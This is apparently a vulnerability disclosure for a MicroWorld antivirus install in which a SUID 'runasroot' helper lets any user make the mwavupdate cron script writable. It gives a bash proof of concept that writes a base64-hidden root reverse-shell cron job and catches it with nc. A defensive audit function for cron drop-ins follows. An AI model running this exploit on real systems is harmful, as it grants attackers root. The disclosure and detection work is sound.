Context:
- This software has a file, mwavupdate, which is a crontab script. It creates a symlink to /etc/cron.d so that the system runs the update as a cron job.
- runasroot is a SUID binary that allows an unprivileged user to change the permissions of certain files using chmod. mwavupdate is in that list too.
→ An attacker can change the permissions of mwavupdate and overwrite the crontab with a malicious task to execute system commands as root.
Exploit demo that gains a reverse shell (localhost):
#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo "KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888
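On the detection side, the following audit is an added example, not part of the original write-up or the vendor's code. It flags cron drop-in entries shaped like mwavupdate: symlinks resolving outside the cron directory, targets not owned by the expected account, and group- or world-writable targets. The symlink check matters because the demo sets the mode back to 750 afterwards, so a permission check alone can miss the change. The function names and fixture paths are hypothetical, and GNU stat and readlink are assumed.

```shell
#!/bin/bash
# Added example (not vendor code). Audits a cron drop-in directory for entries
# shaped like the mwavupdate symlink above. Needs GNU stat and readlink -f.
# Usage: audit_cron_dir [DIR] [EXPECTED_OWNER_UID]
audit_cron_dir() {
    local dir="${1:-/etc/cron.d}" want_uid="${2:-0}"
    local realdir entry target uid mode findings=0
    realdir=$(readlink -f -- "$dir")

    for entry in "$dir"/*; do
        [ -e "$entry" ] || continue          # empty glob or dangling symlink
        target=$(readlink -f -- "$entry")    # real file behind any symlink
        uid=$(stat -L -c %u -- "$entry")     # -L: stat the target, not the link
        mode=$(stat -L -c %a -- "$entry")

        # 1. Symlink whose real file lives outside the cron directory:
        #    whoever can modify that path controls a root cron job.
        if [ -L "$entry" ] && [ "$(dirname -- "$target")" != "$realdir" ]; then
            echo "SYMLINK_OUTSIDE $entry -> $target"
            findings=$((findings + 1))
        fi
        # 2. Real file not owned by the expected account.
        if [ "$uid" != "$want_uid" ]; then
            echo "OWNER uid=$uid $target"
            findings=$((findings + 1))
        fi
        # 3. Real file is group- or world-writable (octal bits 020 and 002).
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE mode=$mode $target"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]                    # non-zero status if anything was flagged
}

# Constructed fixture: $1/app/etc stands in for the product's directory,
# $1/cron.d for /etc/cron.d. One symlinked job, one ordinary local job.
make_fixture() {
    mkdir -p "$1/app/etc" "$1/cron.d"
    printf '* * * * * root /bin/true\n' > "$1/app/etc/update-job"
    printf '* * * * * root /bin/true\n' > "$1/cron.d/local-job"
    chmod 644 "$1/app/etc/update-job" "$1/cron.d/local-job"
    ln -s "$1/app/etc/update-job" "$1/cron.d/update-job"
}
```

Run `audit_cron_dir` with no arguments as root to check the live /etc/cron.d; each finding is one line and the exit status is non-zero when anything is flagged.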